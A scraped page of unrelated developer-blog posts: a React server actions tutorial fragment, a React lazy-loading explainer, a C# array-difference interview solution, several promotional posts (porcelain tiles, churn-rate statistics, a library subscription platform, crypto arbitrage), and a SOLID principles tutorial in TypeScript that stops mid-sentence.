<title>fun!</title> <script defer src="main.js"></script> </head> <body> <div id="root"></div> </body> </html> ``` ## The `src` folder Until here the setup. Now we will focus on creating code for our app. First we need to create the `app.js` file, the entry point of our app (a React component). ```javascript "use client"; import Comp1 from "./non-bloking-server-actions-components/comp1/callable"; export default function () { return <Comp1 name="Albert" />; } ``` `Comp1` is in this case a client component that calls a none bloking server action: ```javascript "use client"; import action from "./action"; export default function (props) { return action(props); } ``` `action` is the none bloking server action: ```javascript "use server"; import Output from "./output"; export default function ({ name }) { const messagePromise = new Promise((res) => setTimeout(() => res("hello x " + name), 2000) ); return <Output greetingPromise={messagePromise} />; } ``` `Output` is a React Client Component: ```javascript "use client"; import Counter from "../../pure-client-components/counter"; import Wrapper from "../../wrapper"; export default function ({ greetingPromise }) { return ( <> <div> <Wrapper>{greetingPromise}</Wrapper> </div> <Counter /> </> ); } ``` `Wrapper` is this React Client Component: ```javascript "use client"; import { Suspense } from "react"; import ErrorBoundary from "./error-boundary"; export default function Wrapper({ children }) { return ( <ErrorBoundary fallback={<div>Something crashed.</div>}> <Suspense fallback={<div>Loading...</div>}>{children}</Suspense> </ErrorBoundary> ); } ``` and `Counter` is a regular React Client Component: ```javascript "use client"; import { useState } from "react"; export default function Counter() { const [count, setCount] = useState(0); const increment = () => { setCount(count + 1); }; return <button onClick={increment}>{count}</button>; } ``` ## Conclusion You see how with the use of non blocking server actions that return client components, server components are not necessary. What we see in this example is counter available and interactive from the first moment, and a loading indicator for a greeting message. ## References The original setup for a working implementation of React Server Components without a framework was taken from [here](https://www.reddit.com/r/react/comments/16jq5z4/tutorial_how_to_use_react_server_components_rsc/).
roggc
1,912,186
10 Facts About ReactJS Lazy Loading: Optimizing Your Web Application's Performance
Lazy loading in ReactJS is an essential technique for enhancing the performance of web applications...
0
2024-07-05T04:13:53
https://dev.to/vyan/10-facts-about-reactjs-lazy-loading-optimizing-your-web-applications-performance-13ck
webdev, javascript, react, beginners
Lazy loading in ReactJS is an essential technique for enhancing the performance of web applications by loading components only when needed. This approach ensures a smoother user experience and more efficient use of resources. Here are ten intriguing facts about ReactJS lazy loading, explained with engaging analogies to make them easy to understand. ## Fact 1: Lazy Loading in React is Like a Library with Books Imagine you have a vast library of books at home. When you leave the house, you don't need to carry all the books with you; you only take the ones you need at the moment. Similarly, in React, lazy loading means you only load the components you need when you need them. This helps reduce the initial load time of your application, making it faster and more efficient. ## Fact 2: React.lazy is Like a Special Key That Unlocks the Bookshelf React provides a function called `React.lazy`, which acts like a special key that unlocks the bookshelf. This function allows you to specify which components should be loaded lazily. By using `React.lazy`, you can defer the loading of a component until it is actually needed in the application. ```javascript const LazyComponent = React.lazy(() => import('./LazyComponent')); ``` ## Fact 3: The Loader Function is Like a Librarian Who Fetches the Book for You The loader function in `React.lazy` is akin to a librarian who fetches the book for you. It’s a function that returns a promise which resolves to the component that should be loaded lazily. This ensures that the component is only fetched when required. ```javascript const LazyComponent = React.lazy(() => import('./LazyComponent')); ``` ## Fact 4: The Loader Function Can Be Like a Complex Search Algorithm Imagine the librarian using a complex search algorithm to find the book you're looking for in a vast library. Similarly, the loader function in React can perform complex operations, such as making API calls or fetching resources, to retrieve the component. ## Fact 5: When React Needs the Component, It’s Like Asking the Librarian to Fetch the Book When React needs to render the component, it’s like asking the librarian to fetch the book. React calls the loader function, waits for the promise to resolve, and then renders the component. This ensures that the component is available just in time for its use. ```javascript const LazyComponent = React.lazy(() => import('./LazyComponent')); function App() { return ( <React.Suspense fallback={<div>Loading...</div>}> <LazyComponent /> </React.Suspense> ); } ``` ## Fact 6: Lazy Loading Can Be Used Like a Personalized Book Recommendation Service Lazy loading can be dynamically controlled based on user interactions or other conditions. This is similar to a personalized book recommendation service where you get suggestions based on your preferences. You can load components dynamically to enhance the user experience. ## Fact 7: Lazy Loading Can Be Used Like a Background Task Lazy loading can be executed as a background task, similar to how background tasks run while you're doing something else. This ensures that components are loaded asynchronously without blocking the main thread, improving the overall performance of the application. ## Fact 8: Wrapping a Component in Suspense is Like Putting a Bookmark in the Book To handle lazy-loaded components properly, you wrap them in `React.Suspense`. This is like putting a bookmark in a book to ensure you don’t lose your place. `React.Suspense` provides a fallback UI while the component is being loaded. ```javascript function App() { return ( <React.Suspense fallback={<div>Loading...</div>}> <LazyComponent /> </React.Suspense> ); } ``` ## Fact 9: React.Suspense is Like a Special Waiting Area `React.Suspense` acts like a special waiting area where you can wait for your book to arrive. It handles the loading state and renders a fallback component until the lazy-loaded component is ready. This ensures a seamless user experience. ## Fact 10: Using Lazy Loading with Other React Features is Like Having a Personal Book Concierge Service Combining lazy loading with other React features is like having a personal book concierge service. It optimizes your application for better performance and scalability, ensuring that your app runs smoothly even as it grows in complexity. ## Conclusion Lazy loading in ReactJS is a powerful technique for improving the performance and efficiency of your web applications. By understanding and leveraging these ten facts, you can optimize your React applications to provide a better user experience and handle resources more effectively. Whether you're just starting with React or looking to refine your existing skills, implementing lazy loading is a step towards creating faster, more responsive web applications.
vyan
1,912,185
Master Minimize Maximum Difference in an Array in C# by 3 Easy Steps
In intermediate-level interviews, candidates are frequently challenged with the task of reducing the...
0
2024-07-05T04:13:11
https://dev.to/rk042/master-minimize-maximum-difference-in-an-array-in-c-by-3-easy-steps-4pai
programming, interview, career, algorithms
In intermediate-level interviews, candidates are frequently challenged with the task of reducing the disparity between the largest and smallest values in an array. You may come across questions asking you to 'minimise the max-min difference,' 'reduce array difference,' or 'achieve optimal array transformation' in C#. Regardless of how the problem is phrased, the central concept remains unchanged: making strategic moves to minimise the gap between the highest and lowest values in an array. ![Learn how to minimize maximum difference in an array using C# with a step-by-step guide. Ideal for programming interviews.](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2ugcxzy6knq0zapzjky6.jpg) Don't miss out—explore these tips before your interview! [Find the largest sum subarray using Kadanes Algorithm](https://interviewspreparation.com/finding-the-largest-sum-subarray-using-kadanes-algorithm/) [Mastering Object-Oriented Programming in C++](https://interviewspreparation.com/understanding-object-oriented-programming-oop-in-cpp/) [Palindrome Partitioning A Comprehensive Guide](https://interviewspreparation.com/palindrome-partitioning-a-comprehensive-guide/) [what is parameter in coding and what is the deference between param and argument in programming] (https://interviewspreparation.com/what-is-a-parameter-in-programming/) [how to inverse a matrix in c#](https://interviewspreparation.com/how-to-inverse-a-matrix-in-csharp/) [find the first occurrence of a string](https://interviewspreparation.com/find-the-first-occurrence-of-a-string/) [Longest common substring without repeating characters solution](https://interviewspreparation.com/longest-common-substring-without-repeating-characters/), [Function Overloading in C++](https://interviewspreparation.com/function-overloading-in-cpp/), [Two Sum LeetCode solution in C#](https://interviewspreparation.com/two-sum-leetcode-solution/) [Method Overloading vs. Method Overriding in C#](https://interviewspreparation.com/method-overloading-vs-method-overriding-in-csharp-interviews/) ## Understanding the Problem As the title suggests, the interviewer will present an array and ask you to perform a series of moves to reduce the difference between the largest and smallest values in the array. Occasionally, they might permit up to three moves to change any element to any value in the array by using the Minimize Maximum Difference technique. The objective is to achieve the smallest possible difference. For example, consider the array nums = [1, 5, 0, 10, 14]. With three moves, you can alter the values to minimise the maximum difference. This task can initially seem challenging, but we will break it down step by step. In the next section, I will provide a real-world example of minimising the maximum difference in an array. [Follow Original page for real-world example with Logical Approach to Minimize Maximum Difference in Array](https://interviewspreparation.com/minimize-maximum-difference-in-array/) ## C# Program to Minimize Maximum Difference in Three Moves ``` using System; using System.Linq; //program by interviewspreparation.com public class MinimizeDifference { public static int MinDifference(int[] nums) { if (nums.Length <= 4) return 0; Array.Sort(nums); return Math.Min(nums[nums.Length - 4] - nums[0], Math.Min(nums[nums.Length - 3] - nums[1], Math.Min(nums[nums.Length - 2] - nums[2], nums[nums.Length - 1] - nums[3]))); } } ``` In summary, minimizing the difference between the largest and smallest values in an array after three moves involves: 1. Sorting the array. 2. Calculating the differences for each of the four possible scenarios. 3. Selecting the minimum difference from these scenarios. By following these steps, you can effectively reduce the difference in an array using C#.
rk042
1,912,184
Lioli Ceramica
Powered by innovation and advanced technology, Lioli has swiftly become a leading porcelain tile...
0
2024-07-05T04:01:39
https://dev.to/lioli_ceramica/lioli-ceramica-4k9b
Powered by innovation and advanced technology, [Lioli](https://www.lioliceramica.com/) has swiftly become a leading porcelain tile company in India, gaining international recognition. In just four years, we have established ourselves as one of the most reliable [porcelain slab manufacturers](https://www.lioliceramica.com/about-lioli-ceramica/) globally, renowned for our high-quality products and exceptional customer service to clients and partners worldwide. Our expertise in delivering exceptional slab solutions with world-class technology has made Lioli a trailblazer in producing [1600*3200mm porcelain slabs](https://www.lioliceramica.com/product/sizes) in India. Inspired by the beauty of nature, we offer superior alternatives to marble slabs through a blend of design and excellent craftsmanship. With a daily production capacity of 13,000 sq. meters, we are a globally recognized slab tile manufacturer based in Morbi, setting industry benchmarks with our unmatched porcelain slabs, ideal for both traditional and modern architectural, furnishing, and design uses. Lioli caters to all your architectural needs with state-of-the-art porcelain slabs designed to bring a majestic touch to any space. Website - https://www.lioliceramica.com/ Facebook - [https://www.facebook.com/lioliceramicapvtltd/](https://www.facebook.com/lioliceramicapvtltd/) Instagram - [https://www.instagram.com/lioliceramicaofficial/](https://www.instagram.com/lioliceramicaofficial/) Linkedin - [https://www.linkedin.com/company/lioli-ceramica-pvt-ltd/](https://www.linkedin.com/company/lioli-ceramica-pvt-ltd/) Youtube - [https://www.youtube.com/@Lioliceramica](https://www.youtube.com/@Lioliceramica)
lioli_ceramica
1,912,183
Average Churn Rate for Subscription Services in 2024
This Blog was Originally Posted to Churnfree Blog The average churn rate for subscription services...
0
2024-07-05T03:58:00
https://churnfree.com/blog/average-churn-rate-for-subscription-services
churnrate, saaschurn, customerchurnrate, churnfree
**This Blog was Originally Posted to [Churnfree Blog](https://churnfree.com/blog/average-churn-rate-for-subscription-services/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution)** The average churn rate for subscription services varies from industry to industry. Understanding the average churn rate for subscription services is essential for any business to grow in 2024. Reaching the average churn rate for subscription services can be tricky, but you can reduce subscription churn with some simple churn retention strategies. The churn rate is the percentage of customers who discontinue their subscriptions within a specific time frame. It’s often measured in terms of monthly recurring revenue (MRR) and annual recurring revenue (ARR), key financial metrics for subscription-based businesses. The average annual churn rate for subscription companies typically ranges between 5-7%. A monthly average churn rate for subscription services is around 4%. However, these figures can vary depending on industry and market conditions. You can compare these average [churn rate benchmarks](https://churnfree.com/blog/b2b-saas-churn-rate-benchmarks/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution) against your own gauge to see where your business stands. **Exploring Average Churn Rate for Subscription Services by Industry** Different industries experience varying levels of churn, influenced by factors like customer engagement, pricing strategies, and market saturation. Let’s explore average churn rate for subscription services in different industries: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2027zl8z1z2pim9lx5ye.png) **SaaS Subscription Services** According to Recurly, the average churn rate for SaaS is 3.36% for voluntary churn. SaaS is a B2B service and, therefore, has lower churn rates. The SaaS sector shows significant variance in [SaaS churn rate](https://churnfree.com/blog/b2b-saas-churn-rate-benchmarks/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution), with B2B platforms typically experiencing lower churn rates, around 3.5% to 4.67%, compared to B2C platforms. This difference is often due to the critical nature of B2B services and the long-term contracts commonly associated with them. **Related Read: [What is a good churn rate for SaaS?](What is a good churn rate for SaaS?)** **Consumer-Oriented Services** Direct-to-consumer (DTC) businesses usually have higher average subscription churn rates. Media and Entertainment, Consumer Goods, and Retail reports tend to have higher [customer churn rate](https://churnfree.com/blog/a-look-at-customer-churn-rate/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). Industries such as Digital Media, Entertainment, Consumer Goods, and Retail report an average churn rate of around 6.5%. This is relatively high compared to SaaS churn rates, which average about 3.8%. **Energy/Utilities** In the Energy/Utilities sector, the average churn rate for subscription services stands at approximately 11%. This figure underscores the importance of businesses in this sector focusing on customer retention strategies, especially considering the competitive nature of the energy market. **IT Services** The IT Services industry shows a lower churn rate, around 12%. This relatively lower rate can be attributed to the indispensable nature of IT services for businesses, which often leads to longer contract durations and higher customer retention. **Computer Software** The Computer Software industry experiences an average churn rate of about 14%. Despite the essential role of software in modern business operations, the competitive market and rapid technological advancements contribute to this churn rate. **Professional Services** Professional Services face a higher churn rate, averaging 27%. This sector’s high rate can be linked to the need for personalized service delivery and the intense competition among firms offering these services. **Clothing Subscription Box** Clothing Subscription Box Churn Rates, similar to fashion subscription services, often see high churn rates. The average clothing subscription services have churn rates of around 10.54% per month due to fluctuating consumer interests and a competitive market. **News Subscriptions** News subscriptions face challenges in maintaining subscribers, especially in an era where free content is readily accessible. Factors like content quality, pricing, and the proliferation of alternative news sources widely influence the churn rate in this niche. **E-commerce Subscriptions** As reported by e-commerce platforms, including Shopify, the average churn rate of e-commerce subscriptions is around 5%. **Streaming Services** The average churn rates for streaming services like Netflix, Amazon Prime, Disney, etc., are reported to be high. In the US, streaming services had a churn rate of around 37% for the second half of 2022. The churn rate was significantly higher with Generation Z and millennials than with boomers and Gen X. **Factors Influencing Subscription Churn** Pricing is one of the main [causes of churn](https://churnfree.com/blog/analyze-customer-churn-causes/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). According to a survey, approximately 71% of the customers unsubscribed because of high pricing or an increase in pricing. Other than that, most sign ups never turn into upgrades due to hidden charges, such as additional fees for premium features or unexpected price increases after a trial period, which causes customers to churn. This can be resolved by creating a transparent pricing calculator and responding to churn. **Monitoring and Responding to Churn** It is essential for subscription businesses to monitor their churn rates closely and understand the underlying reasons. Even slight increases in churn can indicate potential issues that need immediate attention to retain customers and sustain growth. By utilizing a [churn prediction software](https://churnfree.com/blog/churn-prediction-software/), you can confidently predict churn and implement effective strategies to avoid high churn rates, ensuring the security and stability of your business. The average subscription churn rate can serve as a critical metric for the health of a subscription-based business. Keeping this rate at or below industry benchmarks is essential for the long-term sustainability of a business. By delving into these industry-specific churn rates, businesses can gain a comprehensive understanding of the factors that drive customer turnover. This will help you in building strong [customer retention strategies](https://churnfree.com/blog/customer-retention-strategies/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution), thereby reducing customer churn and achieving [net negative churn](https://churnfree.com/blog/net-negative-churn/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7exwrfqruj2euinui4sp.png) In case you feel like this lady after looking at the average churn rates by industry, don’t worry [Churnfree](https://churnfree.com/) can help you reduce churn by 40%. Just sign up and find out yourself. If you’d like to learn more about churn rate and various tricks to [reduce customer churn](https://churnfree.com/blog/how-to-reduce-customer-churn/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution), follow [Churnfree Blog](https://churnfree.blog/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). **FAQs** **What is the typical churn rate for subscription-based businesses in 2024?** The typical churn rate for subscription services generally falls between 6-8%. However, businesses can strive to reduce their churn rate below this average, presenting a promising opportunity for improvement. Understanding why customers cancel their subscriptions and how to calculate your company’s churn rate is crucial for this journey of enhancement. **What are typical churn rates for digital subscriptions?** Digital subscription companies generally see an average annual churn rate of 5-7%. A monthly churn rate of 4% is often considered adequate. However, these rates can vary depending on the specific market and industry, so it is beneficial to look at industry benchmarks to evaluate your business’s performance. **How is the retention rate for a subscription service determined?** The retention rate of a subscription service is determined by the percentage of users who continue to use the service over a given period, such as weekly or monthly. This rate is a critical metric for assessing [customer loyalty](https://churnfree.com/blog/customer-loyalty/?utm_source=Dev.to&utm_medium=referral&utm_campaign=Content_distribution). Additionally, Monthly Recurring Revenue (MRR) retention, which tracks the stability of revenue from recurring subscriptions over time, is another critical metric to consider.
churnfree
1,912,182
Unlocking the Future of Library Subscription Services with gylyb
In today’s digital age, library subscription services are evolving rapidly, and libraries everywhere...
0
2024-07-05T03:46:46
https://dev.to/gylyb/unlocking-the-future-of-library-subscription-services-with-gylyb-46go
In today’s digital age, library subscription services are evolving rapidly, and libraries everywhere are feeling the shift. From academic libraries to public and research-focused institutions, there’s a growing demand for digital resources that are both comprehensive and up-to-date. This is where gylyb comes in — a platform designed to transform how library subscription services are promoted and managed. **<u>The Changing Landscape of Library Subscription Services</u>** Library subscription services are now the cornerstone of modern libraries. They offer access to a vast array of digital content, including e-books, journals, databases, and multimedia resources. This wealth of information ensures that libraries can meet the diverse needs of their patrons. But with this growth comes complexity. Identifying the right products, negotiating terms, and tracking usage can be challenging. gylyb is here to simplify this process. **<u>gylyb: Bridging the Gap in Library Subscription Services</u>** gylyb, short for “Get Your Library-Your Bridge,” is revolutionizing the way libraries and entrepreneurs interact with subscription services. It’s a unified platform where publishers can post their products, and entrepreneurs, known as InflueNeurs, can promote these products to institutions, particularly libraries. gylyb makes managing and promoting library subscription services straightforward and efficient for everyone involved. **<u>Here’s how gylyb is making a difference:</u>** **1. Centralized Platform for Product Exploration:—** gylyb provides a centralized platform for publishers to upload their subscription-based products. Libraries can browse a wide range of offerings, from academic journals to multimedia databases, all in one place. **2. Empowering InflueNeurs:—** gylyb empowers individuals with strong institutional networks to become InflueNeurs. These entrepreneurs can choose products they believe in, obtain necessary certifications, and promote these products to their contacts within libraries. **3. Simplified Negotiations:—** Negotiating terms for library subscription services can be daunting. gylyb simplifies this process by providing a clear framework for negotiations, ensuring that both libraries and publishers can agree on terms efficiently and transparently. **4. Effortless Tracking and Management:— **gylyb’s built-in CRM system allows InflueNeurs and libraries to track subscription statuses, manage renewals, and monitor usage seamlessly. This ensures that libraries can keep their subscriptions up-to-date and relevant to their patrons’ needs. **5. Transparent Commission System:—** InflueNeurs earn commissions for promoting library subscription services. gylyb ensures that the commission process is transparent and timely, fostering trust and motivation among InflueNeurs. **<u>The Benefits of Using gylyb for Library Subscription Services</u>** **- Access to Diverse Products:—** Libraries can access a diverse range of subscription services through gylyb, ensuring they have the resources needed to meet their patrons’ demands. **- Enhanced Efficiency:—** By centralizing product exploration, negotiation, and management, gylyb enhances the efficiency of managing library subscriptions, saving time and effort for library staff. **- Empowered Entrepreneurs:—** gylyb provides a unique opportunity for entrepreneurs to leverage their influence and networks to promote library subscription services, creating a win-win scenario for both libraries and InflueNeurs. **- Transparency and Trust:—** gylyb’s transparent processes build trust among all stakeholders, ensuring fair dealings and timely payments. **<u>Conclusion: Join the gylyb Revolution</u>** As the demand for digital resources continues to grow, the need for efficient and effective library subscription services becomes more critical. gylyb is at the forefront of this revolution, offering a platform that bridges the gap between publishers, libraries, and entrepreneurs. By simplifying the promotion, negotiation, and management of library subscriptions, gylyb ensures that libraries can provide top-notch resources to their patrons while empowering entrepreneurs to thrive. Join the gylyb revolution today and discover how we can transform the way you manage and promote library subscription services. Get Your Library-Your Bridge with gylyb and unlock a world of possibilities.
gylyb
1,912,181
Crypto Arbitrage: A Comprehensive Guide
Introduction Cryptocurrency has revolutionized the financial landscape, offering a...
27,673
2024-07-05T03:45:12
https://dev.to/rapidinnovation/crypto-arbitrage-a-comprehensive-guide-4cck
## Introduction Cryptocurrency has revolutionized the financial landscape, offering a new dimension of digital assets that are decentralized and often volatile. This new financial ecosystem has given rise to various trading strategies, one of which is arbitrage. Arbitrage involves capitalizing on price differences of the same asset across different markets or platforms. ## What is Crypto Arbitrage? Crypto arbitrage is a financial strategy that involves buying a cryptocurrency on one exchange where the price is low and simultaneously selling it on another exchange where the price is higher. This exploits the price differences across different platforms to make a profit. ## Types of Crypto Arbitrage There are several types of crypto arbitrage strategies: ### Spatial Arbitrage Involves buying a cryptocurrency on one exchange where the price is low and selling it on another exchange where the price is higher. ### Triangular Arbitrage Involves trading discrepancies between three currencies on the same exchange. ### Statistical Arbitrage Employs time series analysis, statistical methods, and computational algorithms to capitalize on pricing inefficiencies between securities. ## How to Identify Arbitrage Opportunities Identifying arbitrage opportunities requires a keen eye for detail, a deep understanding of market mechanisms, and the right tools to spot price discrepancies that can be exploited for profit. ## Benefits of Crypto Arbitrage ### Profit Potential in Volatile Markets In volatile markets, the price discrepancies between exchanges can widen significantly, thus increasing the potential profit margin for arbitrage strategies. ### Risk Mitigation Through Arbitrage Arbitrage is considered a relatively low-risk way to profit from the volatile crypto markets by minimizing the time held in the asset. ## Challenges in Crypto Arbitrage ### Transaction Speed and Timing The success of an arbitrage strategy often hinges on the ability to execute transactions swiftly. ### Fees and Costs Impacting Profitability Understanding various fees is crucial for anyone considering this investment strategy. ### Regulatory and Legal Considerations The regulatory and legal landscape for cryptocurrency can impact the viability of crypto arbitrage strategies. ## Real-World Examples of Successful Crypto Arbitrage ### Case Study 1: Spatial Arbitrage Between Two Major Exchanges Involves taking advantage of the price differences for the same asset on different exchanges. ### Case Study 2: Triangular Arbitrage Within a Single Exchange Involves trading three different currencies within the same exchange to exploit discrepancies in their relative prices. ## Conclusion ### Summary of Crypto Arbitrage Trading Crypto arbitrage trading involves capitalizing on the price differences of cryptocurrencies across various exchanges. This strategy can be particularly lucrative due to the volatile nature of cryptocurrency markets. ### Final Thoughts on Maximizing ROI Through Arbitrage Maximizing ROI through crypto arbitrage requires strategic planning, technological assistance, and continuous market analysis. By understanding the intricacies of the market and utilizing technology to its fullest potential, traders can maximize their ROI and succeed in the competitive world of cryptocurrency trading. 📣📣Drive innovation with intelligent AI and secure blockchain technology! Check out how we can help your business grow! [Blockchain Development](https://www.rapidinnovation.io/service- development/blockchain-app-development-company-in-usa) [AI Development](https://www.rapidinnovation.io/ai-software-development- company-in-usa) [Blockchain Development](https://www.rapidinnovation.io/service- development/blockchain-app-development-company-in-usa) [AI Development](https://www.rapidinnovation.io/ai-software-development-company- in-usa) ## URLs * <https://www.rapidinnovation.io/post/crypto-arbitrage-trading-opportunities-maximize-your-roi> ## Hashtags #CryptoArbitrage #BlockchainTechnology #TradingStrategies #MarketEfficiency #CryptoTrading
rapidinnovation
1,912,180
gylyb: Get Your Library - Your Bridge
gylyb: Get Your Library - Your Bridge is a platform designed to help individuals in the library...
0
2024-07-05T03:44:40
https://dev.to/gylyb/gylyb-get-your-library-your-bridge-pnn
gylyb: Get Your Library - Your Bridge is a platform designed to help individuals in the library industry boost their earnings by recommending products and services for institutional purchases and subscriptions. We support InflueNeurs – individuals with a blend of influence and entrepreneurship – to turn their networks into successful businesses while maintaining a strong commitment to privacy. Join us in transforming your influence into a thriving business and making a positive impact on the library community. Visit Here : https://www.gylyb.com Email : [email protected] Contact : +91 7905201031 Youtube : https://www.youtube.com/@gylybbox Twitter : https://twitter.com/BoxGylyb Linkedin : https://www.linkedin.com/in/gylyb-get-your-library-your-bridge-44b810307/ Facebook : https://www.facebook.com/profile.php?id=61551255364591&mibextid=LQQJ4d&rdid=nrD59zxhhH0kUgKq Instagram : https://www.instagram.com/boxgylyb/?igsh=d2o2NWZsOHpyeDIy
gylyb
1,912,178
Ok
Jajajajajw
0
2024-07-05T03:39:12
https://dev.to/alexgrace012/ok-62j
Jajajajajw
alexgrace012
1,911,178
Explanation of SOLID in OOP
Introduction SOLID is a set of five fundamental principles that support enhancing...
27,954
2024-07-05T03:00:00
https://howtodevez.blogspot.com/2024/04/explanation-of-solid-in-oop.html
programming, javascript, typescript, beginners
Introduction ------------ **SOLID** is a set of five fundamental principles that support enhancing maintainability and ease of extension for future software development. Introduced by software engineer Robert C. Martin, also known as "Uncle Bob," in the book "Design Principles and Design Patterns," the SOLID principles include: * S - Single Responsibility Principle * O - Open/Closed Principle * L - Liskov Substitution Principle * I - Interface Segregation Principle * D - Dependency Inversion Principle Below, we'll provide detailed explanations and analysis for each principle. Note that the examples in this article are implemented using **TypeScript**, but you can rewrite them in other **object-oriented programming languages**. ![SOLID](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2wvg02725p8mh8dijnuh.png) 1\. Single Responsibility Principle (SRP) ----------------------------------------- **_A class should have one and only one reason to change, meaning that a class should have only one job._** This is considered the simplest and most crucial principle because it relates to most of the other principles. Simply put, when implementing a class/method, it should serve only one specific task. If it has more than one responsibility, it's advisable to split those responsibilities into multiple classes or methods. This practice benefits future maintenance, as when there's a need to modify the functionality of a class/method, we only need to make changes within that class/method without affecting others in the application. Below is an example illustrating a violation of this principle. ```ts class Car { name: string brand: string // format car info getCarInfoText() { return "Name: " + this.name + ". Brand: " + this.brand; } getCarInfoHTML() { return "<span>" + this.name + " " + this.brand + "</span>"; } getCarInfoJson() { return { name: this.name, brand: this.brand } } // store data saveToDatabase() { } saveToFile() { } } ``` Here's an example showing a violation of the **SRP** principle because the **Car** class has too many unrelated functions like formatting info and storing data. These functions should be split into different classes to make things clearer and reduce the complexity of the source code. ```ts // only car info class Car { name: string brand: string } // only use for format class Formatter { formatCarText(car: Car) { return 'Name: ' + car.name + '. Brand: ' + car.brand } formatCarHtml(car: Car) { return '<span>' + car.name + ' ' + car.brand + '</span>' } formatCarJson(car: Car) { return {name: car.name, brand: car.brand} } } // only use for store data class Store { saveToDatabase() {} saveToFile() {} } ``` 2\. Open/Closed Principle (OCP) ------------------------------- **_Objects or entities should be open for extension but closed for modification_** This principle means that a class should be designed in a way that allows new functionality to be added without altering its existing code. To achieve this, we can utilize inheritance, interfaces, or composition. ```ts interface Shape { calculateArea(): number; } class Circle implements Shape { private radius: number; constructor(radius: number) { this.radius = radius; } calculateArea(): number { return Math.PI * this.radius * this.radius; } } class Rectangle implements Shape { private width: number; private height: number; constructor(width: number, height: number) { this.width = width; this.height = height; } calculateArea(): number { return this.width * this.height; } } ``` In the example above, the **Shape** interface defines a method called **_calculateArea_** used to calculate the area of a shape. Both the **Circle** and **Rectangle** classes, when implementing this interface, must define their own way of calculating the area for each shape. This implementation approach is beneficial for future extension. If we add more shapes in the future (such as triangles, quadrilaterals, etc.), we only need to implement the **Shape** interface similarly and define the method to calculate the area for each shape, without needing to modify the existing classes. This avoids disrupting the existing logic of the system. 3\. Liskov Substitution Principle (LSP) --------------------------------------- This principle was proposed by Barbara Liskov in 1987. Its essence is as follows: **_Let q(x) be a property provable about objects of x of type T. Then q(y) should be provable for objects y of type S where S is a subtype of T._** In simpler terms for object-oriented programming, the principle is understood as: **_Objects of a superclass should be replaceable with objects of its subclasses without affecting the correctness of the program._** Below is an example illustrating a violation of **LSP**. In reality, we know that a square is a type of rectangle with equal width and height. However, when implementing methods in the **Square** class that violate the behavior of the **Rectangle** class, it means that **LSP** is being violated. ```ts class Rectangle { height: number width: number setHeight(height: number) { this.height = height } setWidth(width: number) { this.width = width } calculateArea() { return this.height * this.width } } class Square extends Rectangle { // change behavior of super class setHeight(height: number) { this.height = height this.width = height } // change behavior of super class setWidth(width: number) { this.height = width this.width = width } } const rect = new Rectangle() rect.setHeight(10) rect.setWidth(5) console.log(rect.calculateArea()) // 5 * 10 const rect1 = new Square() rect1.setHeight(10) rect1.setWidth(5) console.log(rect1.calculateArea()) // result correct but break LSP ``` In this example, when the **Square** class implements the **_setWidth_** and **_setHeight_** methods from the **Rectangle** class, it violates the **LSP** because it changes both the width and height to be equal. To ensure that the program doesn't violate the **LSP**, it's better to create a parent class, such as the **Shape** class, and then have both **Square** and **Rectangle** inherit from that class. ### Additional Note This principle is highly abstract and prone to violation if you don't fully understand the concept. In **object-oriented programming**, we often build classes based on real-life concepts and objects, such as "a square is a type of rectangle" or "a penguin is a bird." However, you can't directly translate these relationships into source code. Remember, "**_In real life, A is B (a square is a rectangle), but it doesn't necessarily mean that class A should inherit from class B. Class A should only inherit from class B if class A can substitute for class B._**" 4\. Interface Segregation Principle (ISP) ----------------------------------------- **_A client should never be forced to implement an interface that it doesn’t use, or clients shouldn’t be forced to depend on methods they do not use._** The ISP encourages breaking down interfaces into smaller parts so that classes don't have to implement unrelated methods. This helps reduce dependency on unnecessary methods and makes the source code more flexible, easier to extend, and maintain. Here's an example of a violation of the ISP: ```ts interface Animal { eat(): void swim(): void fly(): void } class Fish implements Animal { eat() {} swim() {} fly() { throw new Error('Fish can not fly') } } class Bird implements Animal { eat() {} swim() { throw new Error('Bird can not swim') } fly() {} } ``` Because the **Animal** interface has many methods, and some methods may not be applicable to certain species of animals. When the **Fish** and **Bird** classes implement the **Animal** interface, they have to implement all methods, including unnecessary ones. This leads to wasted effort and increases the complexity of the program unnecessarily. The solution is to split the **Animal** interface into smaller interfaces as follows: ```ts interface Animal { eat(): void } interface Bird { fly(): void } interface Fish { swim(): void } class Dog implements Animal { eat() {} } class Sparrow implements Animal, Bird { eat() {} fly() {} } class Swan implements Animal, Bird { eat() {} swim() {} fly() {} } ``` 5\. Dependency Inversion Principle (DIP) ---------------------------------------- **_Entities must depend on abstractions, not on concretions. It states that the high-level module must not depend on the low-level module, but they should depend on abstractions_** In simpler terms: * High-level modules should not rely on low-level modules; both should rely on abstractions. * Abstractions should not depend on details; details should depend on abstractions. Here's an example of creating a **DataExporter** class that allows exporting data based on the provided `Exporter` (either **ExcelExporter** or **PdfExporter**). The `export` method is defined in the **Exporter** interface, making it easy to create additional exporters for use without needing to change the current source code. ```ts interface Exporter { export(data): void } class ExcelExporter implements Exporter { export(data): void { console.log('Export excel', data) } } class PdfExporter implements Exporter { export(data): void { console.log('Export csv', data) } } class DataExporter { private exporter: Exporter constructor(exporter: Exporter) { this.exporter = exporter } async export(): Promise<void> { const data = await this.fetchData() this.exporter.export(data) } private async fetchData() { return 'Faked data' } } const excelExporter = new ExcelExporter() const pdfExporter = new PdfExporter() const dataExporterExcel = new DataExporter(excelExporter) dataExporterExcel.export() const dataExporterPdf = new DataExporter(pdfExporter) dataExporterPdf.export() ``` It's important to note that the **_Dependency Inversion Principle_** differs from **_Dependency Injection_** because **_Dependency Inversion_** is a principle, while **_Dependency Injection_** is a design pattern. **_Dependency Injection_** is just one of the ways to implement **_Dependency Inversion_**. Conclusion ---------- The 5 **SOLID** principles can be implemented in most object-oriented programming languages like Java, C#, TypeScript, 